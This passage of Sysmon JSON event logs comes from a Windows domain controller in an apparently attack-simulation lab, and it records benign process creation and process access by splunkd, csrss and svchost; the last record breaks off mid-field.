{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2152,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.690\r\nProcessGuid: {A837DB8D-01CA-5F25-0000-00107FFA0300}\r\nProcessId: 3484\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.690","ProcessGuid":"{A837DB8D-01CA-5F25-0000-00107FFA0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2153,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-00107FFA0300}\r\nTargetProcessId: 3484\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-00107FFA0300}","TargetProcessId":"3484","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2154,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-00107FFA0300}\r\nTargetProcessId: 3484\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-00107FFA0300}","TargetProcessId":"3484","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2155,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2156,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2157,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2158,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2159,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.687","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2160,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.687\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 